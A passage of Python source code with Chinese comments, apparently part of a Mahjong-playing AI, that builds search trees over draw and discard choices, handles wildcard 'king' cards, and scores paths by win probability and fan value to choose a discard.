普通无宝胡牌,包括了宝吊(搜索时另一张牌也赋予了宝牌值)的情况\n # if baoHuanYuan and self.kingCard in cNode.cards:\n # cNode.baoHuanYuan = True\n cNode.jiang = t2NCP2[0][0]\n\n elif kingNum == 2: # 宝还原 宝做将 胡牌\n # cNode.baoHuanYuan = True\n cNode.jiang = self.kingCard\n # elif self.xts == 0 and kingNumall == 1: # 飞宝后这里会使搜索多一层,todo 这里应该搜索不到吧\n # cNode.jiang = self.kingCard\n\n # 多宝胡牌判断\n kingNum_remain = kingNum\n trans_t2N = []\n if kingNum >= 2:\n # 一张宝做宝吊,其他宝牌做任意牌\n\n useking = kingNum - 1 # 宝吊牌\n\n t3NKz = []\n t3NSz = []\n for i in range(len(t2NCP2)):\n # eFCards = self.getEffectiveCards(t2NCP[i])\n if t2NCP2[i][0] == t2NCP2[i][1]:\n t3NKz.append(t2NCP2[i][0])\n\n else:\n if t2NCP2[i][0] & 0x0f == 8:\n t3NSz.append(t2NCP2[i][0] - 1)\n\n else:\n t3NSz.append(t2NCP2[i][0])\n trans_t2N.append(t2NCP2[i])\n useking -= 1\n\n if useking >= 0:\n # 上述处理,已经在2N中使用了宝牌变成了3N,所以这里必须有2个以上的宝牌才能凑成3N \n # 由于4宝会直接杠掉,这里不处理\n if useking >= 2:\n # noKingCard = 0\n for card in ocards:\n if card != self.kingCard:\n # noKingCard = card\n if useking - 2 >= 0:\n t3NKz.append(card)\n useking -= 2\n else:\n break\n # if noKingCard != 0:\n # t3NKz.append(noKingCard)\n # useking-=2\n\n if len(cNode.kz) + len(cNode.sz) + len(t3NSz) + len(t3NKz) == 4:\n cNode.kz.extend(t3NKz)\n cNode.sz.extend(t3NSz)\n # if baoHuanYuan and self.kingCard in cNode.cards:\n # cNode.baoHuanYuan = True\n # 所有的2N都已用宝牌配完,这里直接置[]\n for t2tmp in trans_t2N:\n t2NCP2.remove(t2tmp)\n kingNum_remain = useking + 1 # 填胡了,才将宝牌更新 todo 忘了加1\n\n # child = self.inChild(node, cNode)\n # 重复结点检测,如果子结点与现在要扩充的结点一致,则用子结点代替现有结点进行扩充\n # if child != None:\n # self.expandNode(child, ocardsCP, t2NCP)\n # continue\n # 更新出抓牌状态\n cNode.formerCatchCards = copy.copy(node.formerCatchCards)\n cNode.formerCatchCards.append(cNode.catchCard)\n cNode.formerCatchCards.sort()\n cNode.formerOutCards = copy.copy(node.formerOutCards)\n cNode.setParent(node)\n node.addChild(cNode)\n\n # 排序\n cNode.kz.sort()\n cNode.sz.sort()\n self.expandNode(cNode, ocards, t2NCP2, kingNum=kingNum_remain, xts=xts)\n\n def generateTree(self):\n \"\"\"\n 功能:搜索树创建,用于初始化路径的相关变量,包括出牌集合 抓牌集合2N 顺子 刻子等\n 思路:使用了组合信息进行创建和扩展树,将3N直接加入到结点信息中,不再处理,将2N加入到抓牌结点扩展策略集合中,将孤张leftCards加入到出牌结点扩展策略中\n 并增加了宝还原处理\n \"\"\"\n # if self.type==2:\n # node = self.root\n # else:#扩展了op中的结点\n # node=self.root.children[0]\n\n node = self.root\n for a in self.all:\n # t2N = copy.deepcopy(a[2] + a[3])\n # efc_cards, t2_w = self.get_effective_cards_w(t2N)\n #\n # for i in range(len(t2N)):\n # if str(t2N[i]) not in self.t2Nw_Set.keys():\n # self.t2Nw_Set[str(t2N[i])]=t2_w[i]\n # t2N[i].append(t2_w[i])\n #\n # t2N[:len(a[2])] = sorted(t2N[:len(a[2])], key=lambda k: k[2], reverse=True)\n # t2N[len(a[2]):] = sorted(t2N[len(a[2]):], key=lambda k: k[2], reverse=True)\n # # t2N[len():] = sorted(t2N[len(a[2]):], key=lambda k: k[2], reverse=True) #修改为1+\n # # 扩展出牌结点\n ocards = copy.copy(a[-1])\n t2NCP = []\n t2NCP.extend(a[2] + a[3])\n\n # for t2 in t2N:\n # t2NCP.append([t2[0], t2[1]])\n kz = []\n sz = []\n for k in a[0]:\n kz.append(k[0])\n for s in a[1]:\n sz.append(s[0])\n\n # print ('ocards', ocards, 't2NCP', t2NCP)\n\n # if self.kingNum>0:\n # #溢出\n # if len(t2NCP)>4-len(self.suits):\n #\n # for ab in a[3]:\n # if\n # t1=time.time()\n self.expandNode(node=node, ocards=ocards, t2N=t2NCP, kingNum=self.kingNum, kz=kz, sz=sz, xts=a[4])\n # t2=time.time()\n # print ('t21',t2-t1)\n # if self.kingNum!=0:\n # # if self.kingNum<=2:\n # #宝吊打法,最快胡牌\n # node.jiang=self.kingCard\n # self.expandNode(node=node, ocards=ocards, t2N=t2NCP, kingNum=self.kingNum-1, kz=kz, sz=sz,xts=self.xts)\n # #飞宝打法,\n # ocardsKing=copy.copy(ocards)\n\n # ocardsKing.append(self.kingCard)\n # self.expandNode(node=node, ocards=ocardsKing, t2N=t2NCP, kingNum=self.kingNum-1, kz=kz, sz=sz,xts=self.xts)\n\n # if self.kingNum > 1:\n # KN=self.kingNum - 1\n # else:\n # KN=self.kingNum\n #\n #\n # for i in range(KN):\n # ocardsKing.append(self.kingCard)\n # #只有一张宝做宝吊,其他全部打掉\n # if self.kingNum==1:\n # for aa in a[2]:\n # node.jiang = aa[0]\n # t2NCP_rmJ = copy.deepcopy(t2NCP)\n # t2NCP_rmJ.remove(aa)\n # self.expandNode(node=node, ocards=ocardsKing, t2N=t2NCP_rmJ, kingNum=self.kingNum-KN, kz=kz, sz=sz,xts=self.xts+KN)\n # return\n # # #宝牌全部打掉\n # else:\n # # 留一宝\n # node.jiang = self.kingCard\n # self.expandNode(node=node, ocards=ocards, t2N=t2NCP, kingNum=self.kingNum-KN, kz=kz, sz=sz,xts=self.xts+KN)\n # #\n # #全打\n # ocards_allKing=copy.copy(ocards)\n # for i in range(self.kingNum):\n # ocards_allKing.append(self.kingCard)\n # for aa in a[2]:\n # node.jiang = aa[0]\n # t2NCP_rmJ = copy.deepcopy(t2NCP)\n # t2NCP_rmJ.remove(aa)\n # self.expandNode(node=node, ocards=ocards_allKing, t2N=t2NCP_rmJ, kingNum=0,kz=kz, sz=sz,xts=self.xts+self.kingNum)\n # #\n # elif len(a[2])!=0:\n # #aa做将打法\n # for aa in a[2]:\n # node.jiang=aa[0]\n # t2NCP_rmJ=copy.deepcopy(t2NCP)\n # t2NCP_rmJ.remove(aa)\n # # print ocards,t2NCP_rmJ\n # self.expandNode(node=node, ocards=ocards, t2N=t2NCP_rmJ, kingNum=self.kingNum, kz=kz,sz=sz,xts=self.xts)\n #\n # #aa不做将打法\n # node.jiang=0\n # self.expandNode(node=node, ocards=ocards, t2N=t2NCP, kingNum=self.kingNum, kz=kz,sz=sz,xts=self.xts)\n # else:\n # node.jiang=0\n # self.expandNode(node=node, ocards=ocards, t2N=t2NCP, kingNum=self.kingNum, kz=kz, sz=sz,xts=self.xts)\n\n # # 宝还原处理\n # if self.kingNum != 0:\n # allBaoHuanYuan = pinghu(self.cards, self.suits, self.leftNum).sys_info_V3(self.cards, self.suits,\n # self.leftNum)\n # for a in allBaoHuanYuan:\n # t2N = copy.deepcopy(a[2] + a[3])\n # efc_cards, t2_w = pinghu(cards=self.cards, suits=self.suits,\n # leftNum=self.leftNum).get_effective_cards_w(dz_set=t2N, left_num=self.leftNum)\n # for i in range(len(t2N)):\n # t2N[i].append(t2_w[i])\n # t2N[:len(a[2])] = sorted(t2N[:len(a[2])], key=lambda k: k[2], reverse=True)\n # t2N[len(a[2]):] = sorted(t2N[len(a[2]):], key=lambda k: k[2], reverse=True)\n # # t2N[len():] = sorted(t2N[len(a[2]):], key=lambda k: k[2], reverse=True) #修改为1+\n # # 扩展出牌结点\n # ocards = a[-1]\n # t2NCP = []\n # for t2 in t2N:\n # t2NCP.append([t2[0], t2[1]])\n # kz = []\n # sz = []\n # for k in a[0]:\n # kz.append(k[0])\n # for s in a[1]:\n # sz.append(s[0])\n # # 这里宝还原,将kingNum置0\n # self.kingNum = 0\n # kingNum = self.kingNum\n # # for i in range(self.kingNum):\n # # ocards.append(self.kingCard)\n # node.noUseKingNum = kingNum\n # self.expandNode(node=node, ocards=ocards, t2N=t2NCP, kingNum=0, baoHuanYuan=True, kz=kz, sz=sz)\n\n def getRate(self, node, rate):\n \"\"\"\n 功能:对叶结点进行评估\n 思路:递归计算评估值,当叶结点已经胡牌时,计算评估值=胡牌概率×危险度×分数,并进行了去重处理,对具有相同的抓牌路径视为同一路径,对视为相同的路径只取最大的评估值的路径作为最后的路径\n :param node: 本次需要计算的结点\n :param rate: 本路径现有的评估值\n :return: 更新了类变量中各路径的评估值与路径的胡牌信息,包括stateSet 胡牌状态集合 scoreDict 分数集合\n \"\"\"\n # print ('nodeInfo',node.kz,node.sz,node.jiang,node.rate,node.children == [] )\n # if node.level!=0:\n # print ('getRate',node.level)\n children = node.children\n if children == []:\n\n # 胡牌结点\n # 有宝的树\n # print (node.feiKingNum,self.kingNum+self.fei_king,node.level)\n # if self.kingNum>0 and node.feiKingNum==self.kingNum+self.fei_king and node.level>self.xts*2:\n # print (node.feiKingNum,self.kingNum+self.fei_king)\n # return\n if len(node.sz) + len(node.kz) == 4 and node.jiang != 0 and node.rate != 0 and node.type == 2:\n # if\n # node.nodeInfo()\n # if node.rate != 0 and node.type == 2 and len(node.t2) == 2:\n # # print('here')\n # if node.t2[0] != node.t2[1]:\n # # node.rate = float(self.leftNum[convert_hex2index(node.catchCard)]) / self.remainNum * 1\n # node.rate *= 0.5\n # else:\n # node.rate *= 0.25 # print (node.rate) # else: # node.rate*2.0/3\n\n if node.type == 2 and len(node.t2) == 2:\n # if node.t2==[3,3]:\n # print (self.leftNum[convert_hex2index(node.catchCard)])\n node.rate = float(self.leftNum[convert_hex2index(node.catchCard)]) / self.remainNum\n if node.t2[0] == node.t2[1]:\n node.rate *= 1.5\n\n # print ('rate',node.rate,node.catchCard,self.leftNum[convert_hex2index(node.catchCard)])\n # else:\n # print ('ERROR rate rate')\n # return\n\n rate *= node.rate\n if rate != 0 and node.jiang == 0:\n pass\n # print('getRate Error', node.cards, node.kz, node.sz, node.level)\n # todo 可以优化时间\n if rate != 0:\n # if node.level==4:\n # print (node.nodeInfo(),node.parent.parent.nodeInfo())\n catchCards = node.formerCatchCards\n outCards = node.formerOutCards\n state = []\n state.append(node.kz)\n state.append(node.sz)\n state.append(node.jiang)\n # if node.feiKingNum==0:\n # print(node.feiKingNum)\n fan = Fan2(node.kz, node.sz, node.jiang, node, node.feiKingNum,\n self.kingNum + self.fei_king).fanDetect()\n if fan > self.maxScore[0]:\n # self.maxScore[2]=self.maxScore[1]\n self.maxScore[1] = self.maxScore[0]\n self.maxScore[0] = fan\n\n # print ('fan',fan)\n # print (rate)\n score = rate * fan\n # if catchCards==[8,23]:\n # print (\"tree1\",rate,fan,score)\n state.append(fan)\n\n # score = rate * (2 + sum(fanList))\n # if [catchCards,outCards]==[[3, 8, 19], [4, 22, 23]]:\n # print node.t2,node.parent.parent.t2,node.parent.parent.parent.parent.t2\n # print node.rate,node.parent.parent.rate,node.parent.parent.parent.parent.rate\n\n # if node.firstOutCard==0:\n # print ('firstOutCard Error')\n for card in outCards:\n # if card ==22:\n # # print ('state',state,score)\n # if state== [[24], [1, 7, 17, 39], 6, 0]:\n # print (score,node.rate,node.t2,node.parent.parent.rate,node.parent.parent.t2)\n if card not in self.stateSet.keys():\n self.stateSet[card] = [[], [], []]\n self.stateSet[card][0].append(catchCards)\n self.stateSet[card][1].append(outCards)\n self.stateSet[card][2].append(state)\n\n self.scoreDict[card] = []\n self.scoreDict[card].append(score)\n else:\n if catchCards not in self.stateSet[card][0]:\n self.stateSet[card][0].append(catchCards)\n self.stateSet[card][1].append(outCards)\n self.stateSet[card][2].append(state)\n self.scoreDict[card].append(score)\n else:\n\n index = self.stateSet[card][0].index(catchCards)\n if score > self.scoreDict[card][index]:\n self.scoreDict[card][index] = score\n # self.stateSet[card][0][index] = catchCards\n self.stateSet[card][1][index] = outCards\n self.stateSet[card][2][index] = state\n return\n else:\n rate *= node.rate\n for child in children:\n self.getRate(child, rate)\n\n def getCardScore(self):\n \"\"\"\n 功能:计算每张出牌的评估值,并输出评估值最高的牌作为最佳出牌\n 思路:对类变量中的scoreDict 累加计算出牌的评估值\n :return: outCard 最佳出牌\n \"\"\"\n # 建树\n t1 = time.time()\n self.generateTree()\n t2 = time.time()\n outCardsNodes = self.root.children\n for i in range(len(outCardsNodes)):\n rate = 1\n node = outCardsNodes[i]\n self.getRate(node=node, rate=rate)\n nodeNum = 0\n t3 = time.time()\n print('scoreDict', self.scoreDict)\n for k in self.scoreDict.keys():\n\n nodeNum += len(self.scoreDict[k])\n k_score = 0\n for i in range(len(self.scoreDict[k])):\n # print (k)\n # n=self.stateSet[k][0][i][1].count(k)\n # print (k,n)\n if self.stateSet[k][2][i][3] >= 16:\n k_score += self.scoreDict[k][i] * 2\n else:\n k_score += self.scoreDict[k][i]\n # self.scoreDict[k] = sum(self.scoreDict[k])\n self.scoreDict[k] = k_score\n\n print('score', self.scoreDict)\n print('stateSet', self.stateSet)\n print('nodeNum', nodeNum)\n print('usetime', t2 - t1, t3 - t2)\n return self.scoreDict\n\n\nclass Discard_Node:\n def __init__(self, discard=None, AAA=[], ABC=[], jiang=[], T2=[], T1=[], taking_set=[], king_num=0, fei_king=0,\n baohuanyuan=True):\n self.discard = discard\n self.AAA = AAA\n self.ABC = ABC\n self.jiang = jiang\n self.T2 = T2\n self.T1 = T1\n self.king_num = king_num\n self.fei_king = fei_king\n # self.T_selfmo = copy.copy(T_selfmo)\n self.children = []\n self.taking_set = taking_set\n self.baohuanyuan = baohuanyuan\n # self.value = 1\n self.taking_set_w = []\n\n def add_child(self, child):\n self.children.append(child)\n\n def is_exist(self, nodes):\n for node in nodes:\n if node.discard == self.discard and node.AAA == self.AAA and node.ABC == self.ABC and node.T2 == self.T2 and node.T1 == self.T1 and node.king_num == self.king_num and node.fei_king == self.fei_king:\n return True\n # else:\n # return False\n return False\n\n def node_info(self):\n print(self.AAA, self.ABC, self.jiang, \"T1=\", self.T1, \"T2=\", self.T2, self.taking_set, self.king_num,\n self.fei_king, self.baohuanyuan)\n\n\nclass Take_Node:\n def __init__(self, take=None, AAA=[], ABC=[], jiang=[], T2=[], T1=[], taking_set=[], taking_set_w=[], king_num=0,\n fei_king=0, baohuanyuan=False):\n self.take = take\n self.AAA = AAA\n self.ABC = ABC\n self.jiang = jiang\n self.T2 = T2\n self.T1 = T1\n self.king_num = king_num\n self.fei_king = fei_king\n self.children = []\n self.taking_set = taking_set\n # self.value = value\n self.baohuanyuan = baohuanyuan\n self.taking_set_w = taking_set_w\n\n def add_child(self, child):\n self.children.append(child)\n\n def node_info(self):\n print(self.AAA, self.ABC, self.jiang, \"T1=\", self.T1, \"T2=\", self.T2, self.taking_set, self.king_num,\n self.fei_king, self.baohuanyuan)\n\n def is_exist(self, nodes):\n for node in nodes:\n if node.take == self.take and node.AAA == self.AAA and node.ABC == self.ABC and node.T2 == self.T2 and node.T1 == self.T1 and node.king_num == self.king_num and node.fei_king == self.fei_king:\n return True\n return False\n\n\nclass SearchTree_take:\n def __init__(self, hand, suits, combination_sets, king_card=None, fei_king=0):\n self.hand = hand\n self.suits = suits\n self.combination_sets = combination_sets\n self.xts = combination_sets[0][-2]\n self.tree_dict = []\n self.king_card = king_card\n self.fei_king = fei_king\n if king_card != None:\n self.king_num = hand.count(king_card)\n else:\n self.king_num = 0\n self.discard_score = {}\n self.discard_state = {}\n self.node_num = 0\n self.chang_num = 0\n\n def expand_node(self, node):\n # 胡牌判断\n # print \"a\"\n if len(node.AAA) + len(node.ABC) == 4 and node.jiang != []:\n if node.king_num > 0:\n node.fei_king += node.king_num # 多余的宝牌都没飞掉\n node.king_num = 0\n if node.baohuanyuan and node.fei_king == self.king_num + self.fei_king: # 宝牌全部飞完了,所以就不是宝还原了\n node.baohuanyuan = False\n return\n\n # 超时终止\n # if time.time() - TIME_START > 2.5:\n # logger.warning(\"time out!,%s,%s,%s\", self.hand, self.suits, self.king_card)\n # return\n # 节点扩展,只考虑摸牌\n # 判断需要扩展哪类\n # 当T3的数量不够时\n # if node.king_num == 0:\n if len(node.AAA) + len(node.ABC) < 4:\n if node.T2 != []: # 1、先扩展T2为T3\n for t2 in node.T2:\n for item in t2tot3_dict[str(t2)]:\n if item[1][0] == item[1][1]:\n AAA = MJ.deepcopy(node.AAA)\n AAA.append(item[1])\n ABC = node.ABC\n else:\n AAA = node.AAA\n ABC = MJ.deepcopy(node.ABC)\n ABC.append(item[1])\n T2 = MJ.deepcopy(node.T2)\n T2.remove(t2)\n T1 = node.T1\n if node.king_num > 0 and item[-2] == self.king_card: # 宝还原\n # take = -1 # 修正,0->-1\n # king_num -= 1\n # baohuanyuan = node.baohuanyuan\n child = Take_Node(take=-1, AAA=AAA, ABC=ABC, jiang=node.jiang, T2=T2,\n T1=T1, taking_set=node.taking_set, taking_set_w=node.taking_set_w,\n king_num=node.king_num - 1,\n fei_king=node.fei_king, baohuanyuan=node.baohuanyuan)\n node.add_child(child=child)\n self.expand_node(node=child)\n\n elif node.king_num > 1: # 宝牌补一张\n # take = 0\n # king_num -= 1\n # baohuanyuan = False\n # taking_set = copy.copy(node.taking_set)\n # taking_set_w = copy.copy(node.taking_set_w)\n # king_num = node.king_num\n\n child = Take_Node(take=0, AAA=AAA, ABC=ABC, jiang=node.jiang, T2=T2,\n T1=T1, taking_set=node.taking_set, taking_set_w=node.taking_set_w,\n king_num=node.king_num - 1,\n fei_king=node.fei_king, baohuanyuan=False)\n node.add_child(child=child)\n self.expand_node(node=child)\n else: # normal\n taking_set = copy.copy(node.taking_set)\n taking_set_w = copy.copy(node.taking_set_w)\n taking_set.append(item[-2])\n taking_set_w.append(item[-1])\n child = Take_Node(take=item[-2], AAA=AAA, ABC=ABC, jiang=node.jiang, T2=T2,\n T1=T1, taking_set=taking_set, taking_set_w=taking_set_w,\n king_num=node.king_num,\n fei_king=node.fei_king, baohuanyuan=False)\n node.add_child(child=child)\n self.expand_node(node=child)\n\n if node.T2 == []: # or (node.king_num == 0 and len(node.T2) == 1 and node.T2[0][0] == node.T2[0][1]): # 2、扩展T1为T3? \"t1\":[[t3,t2,p]] 这里无宝要留将的打法\n for t1 in node.T1:\n for item in t1tot3_dict[str(t1)]:\n T1 = copy.copy(node.T1)\n T1.remove(t1)\n # 用于处理废牌存在于T1中的特殊情况\n # flag1 = False\n # for card in item[1]:\n # if card in T1:\n # T1.remove(card)\n # T2 = MJ.deepcopy(node.T2)\n # T2.append(sorted([card, t1]))\n # # logger.info(\"merge T1 to T2,%s,%s\", t1, T2)\n # child = Take_Node(take=-1, AAA=node.AAA, ABC=node.ABC, jiang=node.jiang, T2=T2, T1=T1,\n # taking_set=node.taking_set, taking_set_w=node.taking_set_w,\n # king_num=node.king_num, fei_king=node.fei_king,\n # baohuanyuan=node.baohuanyuan)\n # node.add_child(child=child)\n # self.expand_node(node=child)\n # flag1 = True\n # break\n # if flag1:\n # continue\n\n flag2 = False\n if node.king_num >= 0: # 用于处理宝还原\n for card in item[1]:\n if card == self.king_card:\n T2 = MJ.deepcopy(node.T2)\n T2.append(sorted([card, t1]))\n flag2 = True\n child = Take_Node(take=-1, AAA=node.AAA, ABC=node.ABC, jiang=node.jiang, T2=T2,\n T1=T1,\n taking_set=node.taking_set, taking_set_w=node.taking_set_w,\n king_num=node.king_num - 1, fei_king=node.fei_king,\n baohuanyuan=node.baohuanyuan)\n node.add_child(child=child)\n self.expand_node(node=child)\n if flag2:\n continue\n\n if item[0][0] == item[0][1]:\n AAA = MJ.deepcopy(node.AAA)\n AAA.append(item[0])\n ABC = node.ABC\n else:\n AAA = node.AAA\n ABC = MJ.deepcopy(node.ABC)\n ABC.append(item[0])\n\n # king_num = node.king_num\n\n if node.king_num > 2: # 宝牌有3张以上,直接补2张,即使其中有一张被作为宝还原也不影响\n child = Take_Node(take=[0, 0], AAA=AAA, ABC=ABC, jiang=node.jiang, T2=node.T2, T1=T1,\n taking_set=node.taking_set, taking_set_w=node.taking_set_w,\n king_num=node.king_num - 2, fei_king=node.fei_king,\n baohuanyuan=False)\n node.add_child(child=child)\n self.expand_node(node=child)\n\n elif node.king_num <= 1: # 宝为1或0 的处理\n take = item[1]\n take_w = item[-1]\n\n taking_set = copy.copy(node.taking_set)\n taking_set.extend(take)\n taking_set_w = copy.copy(node.taking_set_w)\n taking_set_w.extend(take_w)\n # taking_set_w.append(take_w[0]) #区别顺序\n # taking_set_w.append(take_w[1]+1)\n child = Take_Node(take=take, AAA=AAA, ABC=ABC, jiang=node.jiang, T2=node.T2, T1=T1,\n taking_set=taking_set, taking_set_w=taking_set_w,\n king_num=node.king_num, fei_king=node.fei_king,\n baohuanyuan=node.baohuanyuan)\n node.add_child(child=child)\n self.expand_node(node=child)\n\n else: # king_num=2 ,补一张牌,或者不补摸2张\n # 用1张宝牌\n for i in range(len(item[1])):\n card = item[1][i]\n take = [0, card]\n\n taking_set = copy.copy(node.taking_set)\n taking_set.append(card)\n taking_set_w = copy.copy(node.taking_set_w)\n taking_set_w.append(1)\n\n child = Take_Node(take=take, AAA=AAA, ABC=ABC, jiang=node.jiang, T2=node.T2, T1=T1,\n taking_set=taking_set, taking_set_w=taking_set_w,\n king_num=node.king_num - 1, fei_king=node.fei_king,\n baohuanyuan=False)\n node.add_child(child=child)\n self.expand_node(node=child)\n\n # 不用宝牌\n # taking_set = copy.copy(node.taking_set)\n # taking_set.extend(item[1])\n # taking_set_w = copy.copy(node.taking_set_w)\n # taking_set_w.extend(item[-1])\n # child = Take_Node(take=item[1], AAA=AAA, ABC=ABC, jiang=node.jiang, T2=node.T2, T1=T1,\n # taking_set=taking_set, taking_set_w=taking_set_w,\n # king_num=node.king_num, fei_king=node.fei_king,\n # baohuanyuan=node.baohuanyuan)\n # node.add_child(child=child)\n # self.expand_node(node=child)\n\n\n\n\n else: # 添加将牌\n # 判断是否已经达到胡牌状态\n # 非双宝做将加宝还原的不算宝还原\n if len(node.AAA) + len(node.ABC) == 4:\n has_jiang = False\n for t2 in node.T2: # 有将\n T2 = MJ.deepcopy(node.T2)\n # 从t2中找到对子作为将牌\n if t2[0] == t2[1]:\n has_jiang = True\n T2.remove(t2)\n child = Take_Node(take=-1, AAA=node.AAA, ABC=node.ABC, jiang=t2, T2=T2,\n T1=node.T1,\n taking_set=node.taking_set, taking_set_w=node.taking_set_w,\n king_num=node.king_num,\n fei_king=node.fei_king, baohuanyuan=False) # 非宝吊宝还原\n node.add_child(child=child)\n self.expand_node(node=child)\n # break #移除,好像也不影响,后面评估去重是按摸牌来确定的,这里也不会摸牌了\n if node.king_num >= 2: # 宝还原\n has_jiang = True # 补上,有宝时不再搜索无将情况\n child = Take_Node(take=-1, AAA=node.AAA, ABC=node.ABC, jiang=[self.king_card, self.king_card],\n T2=node.T2,\n T1=node.T1,\n taking_set=node.taking_set, taking_set_w=node.taking_set_w,\n king_num=node.king_num - 2,\n fei_king=node.fei_king, baohuanyuan=node.baohuanyuan)\n node.add_child(child=child)\n self.expand_node(child)\n\n elif node.king_num > 0: # 宝吊,\n has_jiang = True\n taking_set = copy.copy(node.taking_set)\n taking_set.append(0)\n taking_set_w = copy.copy(node.taking_set_w)\n taking_set_w.append(1)\n child = Take_Node(take=0, AAA=node.AAA, ABC=node.ABC, jiang=[0, 0], T2=node.T2,\n T1=node.T1,\n taking_set=taking_set, taking_set_w=taking_set_w, king_num=node.king_num - 1,\n fei_king=node.fei_king, baohuanyuan=False)\n node.add_child(child=child)\n self.expand_node(child)\n\n if not has_jiang:\n jiangs = copy.copy(node.T1)\n for t2 in node.T2: # 将T2中的牌也加入到将牌中\n jiangs.extend(t2)\n for t1 in jiangs:\n taking_set = copy.copy(node.taking_set)\n taking_set.append(t1)\n taking_set_w = copy.copy(node.taking_set_w)\n taking_set_w.append(1)\n T1 = copy.copy(jiangs)\n T1.remove(t1)\n child = Take_Node(take=t1, AAA=node.AAA, ABC=node.ABC, jiang=[t1, t1], T2=[],\n T1=T1,\n taking_set=taking_set, taking_set_w=taking_set_w, king_num=node.king_num,\n fei_king=node.fei_king, baohuanyuan=False)\n node.add_child(child=child)\n self.expand_node(node=child)\n\n def generate_tree(self):\n kz = []\n sz = []\n for t3 in self.suits:\n if t3[0] == t3[1]:\n kz.append(t3)\n else:\n sz.append(t3)\n for cs in self.combination_sets:\n # 超时处理,直接返回\n # time.sleep(2)\n # if time.time()-TIME_START>2:\n # logger.warning(\"time out!%s,%s,%s\",self.hand,self.suits,self.king_card)\n # return\n # t1=time.time()\n # 这里只搜素非胡牌的出牌\n root = Take_Node(take=None, AAA=cs[0] + kz, ABC=cs[1] + sz, jiang=[], T2=cs[2] + cs[3], T1=cs[-1],\n taking_set=[], taking_set_w=[], king_num=self.king_num,\n fei_king=self.fei_king, baohuanyuan=self.king_num > 0)\n\n self.tree_dict.append(root)\n self.expand_node(node=root)\n\n def cal_score(self, node):\n value = 1\n\n # 矫正1->3的权重\n # t13 = []\n # w_set = []\n # taking_set_w = copy.copy(node.taking_set_w)\n # for k in range(len(node.taking_set_w)):\n # if node.taking_set_w[k] == MJ.w_aa + 1 or node.taking_set_w[k] == MJ.w_ab + 1:\n # taking_set_w[k] -= 1\n # t13.append(k - 1) # t13的前一张牌不能被作为最后一张摸到的牌,这里有顺序\n\n if node.take != 0: # 非宝吊\n w = 0\n\n for i in range(len(node.taking_set)):\n card = node.taking_set[i]\n value *= T_SELFMO[MJ.convert_hex2index(card)]\n if i != len(node.taking_set) - 1:\n w_ = node.taking_set_w[i]\n # elif node.taking_set_w[i]==MJ.w_aa:\n # w_=1.5\n else:\n w_ = 1\n\n value *= T_SELFMO[MJ.convert_hex2index(card)] * w_\n\n # if i not in t13:\n # w_ = 1\n # for j in range(len(taking_set_w)):\n # # if j!=len(node.taking_set_w) and node.taking_set_w[j+1]!=[]\n # if j != i:\n # w_ *= taking_set_w[j]\n #\n # # elif taking_set_w[j] == MJ.w_aa:\n # # w_ *= 1.5 # todo 玄学调试,这里是区别aa+ab与aa+aa的权重比,这里是必须要有的\n # w += w_\n # w_set.append(w_)\n # w *= 1.0 / (len(taking_set_w)-len(t13))\n # w=max(w_set) #只取最大的w\n w = 1\n else: # 宝吊\n for i in range(len(node.taking_set)):\n card = node.taking_set[i]\n if card != 0:\n value *= T_SELFMO[MJ.convert_hex2index(card)] * node.taking_set_w[i]\n else:\n value *= 1.5 # 我给宝吊更多机会\n\n # print node.taking_set\n # if len(node.taking_set)>=2:\n # value*=1.2 #宝吊的真实概率可以翻倍,因为55还可以组456、567、678等,这是隐含的概率\n w = 1\n # print node.taking_set,value,w\n value *= w\n\n # 摸牌概率修正,当一张牌被重复获取时,T_selfmo修改为当前数量占未出现牌数量的比例 0.4s\n # taking_set = list(set(node.taking_set))\n # taking_set_num = [node.taking_set.count(i) for i in taking_set]\n # for i in range(len(taking_set_num)):\n #\n # n = taking_set_num[i]\n #\n # while n > 1:\n # index = MJ.convert_hex2index(taking_set[i])\n # if LEFT_NUM[index] >= n:\n # value *= float((LEFT_NUM[index] - n + 1)) / (LEFT_NUM[index] - n + 2)\n # else: # 摸牌数超过了剩余数,直接舍弃\n # value = 0\n # return value\n # n -= 1\n # len_taking=len(node.taking_set)\n # xts=self.combination_sets[0][-2]\n # 摸牌次数越多,危险度越大\n # if len_taking==xts:\n # value = 1\n # else:\n # value=1\n # for i in range(len_taking-xts):\n # value *= 1 - (0.02*(i+1))\n fan, fan_list = Fan(kz=node.AAA, sz=node.ABC, jiang=node.jiang, fei_king=node.fei_king,\n using_king=self.king_num + self.fei_king - node.fei_king,\n baohuanyuan=node.baohuanyuan).fanDetect()\n # print node.taking_set\n # fan=1\n # fan*=fan/4 #倍率2\n # if fan>=16:# todo 16分倍率2\n # fan*=2\n # n=len(node.taking_set)\n\n # if ROUND+n>9:\n # value *= 0.95**(len(node.taking_set)-self.xts) #加入惩罚系数\n # if fan>=16: #todo 没调好。\n # fan*=1.5\n # fan = 1\n score = fan * value\n # print taking_set\n\n # print fan,value\n # node.node_info()\n # print fan,score\n return score, value, fan_list\n\n def calculate_path_expectation(self, node):\n # 深度搜索\n # node.node_info()\n # print value\n # value_ = value\n # print node.AAA,node.ABC,node.jiang\n\n if len(node.AAA) + len(node.ABC) == 4 and node.jiang != []:\n self.node_num += 1\n # 测试:最快胡牌 #可能搜索到了一些不应该出现的局面,这些概率影响了\n # xts = self.combination_sets[0][-2]\n # layer = len(node.taking_set)\n # if node.take!=0:\n # if layer>xts:\n # return\n # elif layer-1>xts:\n # return\n\n # 弃牌不应该出现在摸牌中 done 先去掉已出牌不再摸的情况\n discard_set = []\n for i in range(node.fei_king - self.fei_king):\n discard_set.append(self.king_card)\n for t2 in node.T2:\n discard_set.extend(t2)\n discard_set.extend(node.T1)\n if self.combination_sets[0][-2] != 0:\n\n for i in range(len(discard_set) - 1, -1, -1): #\n card = discard_set[i]\n\n # 出了对牌,但是最后没有将牌的情况应该舍去,\n if discard_set.count(card) >= 2 and node.take not in [0, -1]:\n return\n # 出牌存在于摸牌中\n if card in node.taking_set:\n # logger.warning(\"remove disicard card in takingset,%s,%s\",discard_set,node.taking_set)\n return\n\n # node.AAA.sort()\n # node.ABC.sort()\n taking_set_sorted = sorted(node.taking_set)\n # taking_set_sorted = node.taking_set\n if discard_set != []:\n score, value, fan_list = self.cal_score(node=node) # 放到外面减耗时\n if score == 0: # 胡牌概率为0\n return\n else:\n return\n # todo 这种按摸牌的评估方式是否唯一准确\n for card in list(set(discard_set)):\n\n # for card in [discard]:\n if card not in self.discard_state.keys():\n self.discard_state[card] = [[], [], [], []]\n if taking_set_sorted not in self.discard_state[card][0]:\n self.discard_state[card][0].append(taking_set_sorted)\n\n self.discard_state[card][1].append([node.AAA, node.ABC, 